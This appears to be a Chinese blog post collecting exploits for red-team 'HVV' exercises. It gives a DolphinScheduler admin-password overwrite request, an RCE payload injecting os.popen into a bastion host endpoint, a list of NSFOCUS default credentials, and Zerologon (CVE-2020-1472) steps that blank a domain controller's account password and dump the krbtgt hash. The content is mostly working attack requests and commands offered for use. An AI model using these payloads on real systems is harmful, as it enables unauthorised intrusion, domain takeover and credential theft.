乐于分享 共同成长

JE2Se ,一个不怎么努力上进的小菜鸡

HVV漏洞合集EXP2

1、Apache DolphinScheduler权限覆盖漏洞[CVE-2020-13922]

大概就长这个样子
《HVV漏洞合集EXP2》

POST /dolphinscheduler/users/update
id=1&userName=admin&userPassword=Password1!&tenantId=1&email=sdluser%40sdluser.sdluser&phone=
《HVV漏洞合集EXP2》

2、齐治堡垒机远程代码执行

POST /shterm/listener/tui_update.php
a=[“t’;import os;os.popen(‘whoami’)#”]
《HVV漏洞合集EXP2》
3、绿盟默认安全产品默认口令

绿盟安全产品默认密码排查列表
IPS入侵防御系统、SAS­H运维安全管理系统、SAS安全审计系统、DAS数据库审计系统、RSAS远程安全评估系统、WAF WEB应用防护系统

  1. sysauditor/sysauditor
  2. sysmanager/sysmanager
  3. supervisor/supervisor
  4. maintainer/maintainer
  5. webpolicy/webpolicy
  6. sysadmin/sysadmin
  7. conadmin/conadmin
  8. supervis/supervis
  9. webaudit/webaudit
  10. sysadmin/sysadmin
  11. conadmin/nsfocus
  12. weboper/weboper
  13. auditor/auditor
  14. weboper/weboper
  15. nsadmin/nsadmin
  16. admin/nsfocus
  17. admin/admin
  18. shell/shell

4、微软NetLogon权限提升漏洞CVE-2020-1472

漏洞描述:

攻击者使用 Netlogon 远程协议 (MS-NRPC) 建立与域控制器连接的 Netlogon 安全通道时,存在特权提升漏洞。当成功利用此漏洞时,攻击者无需通过身份验证,即可在网络中的设备上运行经特殊设计的应用程序,获取域控制器的管理员权限

漏洞影响范围

Windows Server 2008 R2 Service Pack 1
Windows Server 2012, 2012 R2, 2016, 2019
Windows Server, version 1903, 1909, 2004

漏洞复现

POC地址:https://github.com/cube0x0/CVE-2020-1472
python.py CVE-2020-1472.py 域控机器名称$ 域控IP地址 (我这里得域控机器名为dc$)
《HVV漏洞合集EXP2》
执行成功后会将机器账号dc$密码重置为空
使用impacket套件secretsdump dump密码
python secretsdump.py -no-pass redteam/‘域控机器名称$’@域控ip-just-dc-user krbtgt
《HVV漏洞合集EXP2》
ojbk~

点赞

发表评论

电子邮件地址不会被公开。 必填项已用*标注

2 × 1 =